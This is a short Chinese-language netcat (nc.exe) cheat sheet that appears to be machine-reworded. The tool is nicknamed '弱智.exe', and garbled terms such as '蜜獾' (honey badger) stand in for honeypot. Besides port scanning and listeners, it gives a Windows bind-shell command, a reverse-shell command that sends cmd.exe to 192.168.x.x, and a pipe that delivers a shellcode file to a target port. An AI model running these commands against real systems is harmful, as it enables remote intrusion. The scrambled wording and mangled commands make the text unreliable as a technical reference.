nc.exe

nc.exe据互联网上详细介绍又叫弱智.exe，便是大家常听闻的法国军，在命令下采用的互联网监视专用工具。

关键用法如下所示

1)联接到REMOTE服务器，事例： 格式：nc -nvv 192.168.x.x 80 讲解：连到192.168.x.x的TCP80端口号

2)监视LOCAL服务器，事例： 格式：nc -l -p 80 讲解：监视该设备的TCP80端口号

3)扫描仪远程控制服务器，事例： 格式：nc -nvv -w2 -z 192.168.x.x 80-445 讲解：扫描仪192.168.x.x的TCP80到TCP445的全部端口号

4)REMOTE服务器关联SHELL，事例： 格式：nc -l -p 5354 -t -e c:\winnt\system32\cmd.exe 讲解：关联REMOTE服务器的CMDSHELL在REMOTE服务器的TCP5354端口号

5)REMOTE服务器关联SHELL并反方向联接，事例： 格式：nc -t -e c:\winnt\system32\cmd.exe 192.168.x.x 5354 讲解：关联REMOTE服务器的CMDSHELL并反方向联接到192.168.x.x的TCP5354端口号 之上为最主要的几类用法（实际上NC的用法也有许多， 当相互配合管路指令|与跳转指令，这些指令作用更强劲......）。

高級用法：

6)作进攻程序流程用，事例：

格式1：type.exe c:\exploit.txt|nc -nvv 192.168.x.x 80

格式2：nc-nvv192.168.x.x80

讲解：联接到192.168.x.x的80端口号，并在其管路中推送'c:\ex ploit.txt'的內容(二种格式确实有同样的实际效果， 真的是有同工异曲之妙:P)

附：'c:\exploit.txt'为shellcode等 7)作蜜獾用[1]，事例： 格式：nc -L -p 80 讲解：应用'-L'(留意L是英文大写)能够不断地监视某一个端口号，直至ctrl c才行

8)作蜜獾用[2]，

事例： 格式：nc -L -p 80c:\log.txt

讲解：应用'-L'能够不断地监视某一个端口号，直至ctrl c才行，与此同时把結果輸出到'c:\log.txt'中，假如把' gt;' 改成''即能够增加日志 附：'c:\log.txt'为日志等

9)作蜜獾用[3]，

事例： 格式1：nc -L -p 80 格式2：type.exe c:\honeypot.txt|nc -L -p 80

讲解：应用'-L'能够不断地监视某一个端口号，直至ctrl c才行，并把'c:\honeypot.txt'的內容'送'入其 管路中